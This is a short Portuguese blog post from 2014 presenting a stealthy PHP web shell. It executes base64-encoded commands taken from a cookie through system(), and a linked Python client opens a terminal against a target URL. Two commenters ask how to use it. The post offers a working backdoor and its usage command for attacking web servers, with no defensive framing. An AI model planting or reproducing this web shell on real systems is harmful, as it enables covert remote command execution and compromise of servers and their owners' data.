terça-feira, 7 de janeiro de 2014

Webshell via COOKIE


O Script feito em PHP usa COOKIE uma variável global em vez de GET e POST em sua WebShell para ser mais furtivo.
Escrito por Ahmed Shawky @lnxg33k
O código a seguir é uma alternativa para os métodos GET e POST
como ele usa uma variável global _COOKIE.
Deve funcionar da seguinte forma:

system(base64_decode($_COOKIE["1"]));


O código feito em Python, Explora isso abrindo um terminal para execução dos comandos desejados.
Executando:
./cookie.py http://alvo.com.br/cookie.php


Executando: ./cookie.py http://alvo.com.br/cookie.php


#BAIXAR https://github.com/lnxg33k/misc/blob/master/cookie.py

2 comentários:

  1. Amigo, qual é a regra que está a explorar ? sqlinjection ? não compreendi como posso usar o script em python.
    Obrigado cara :D

    ResponderExcluir
  2. Pode passar mais informações de como usar ?
    Abraços.

    ResponderExcluir

............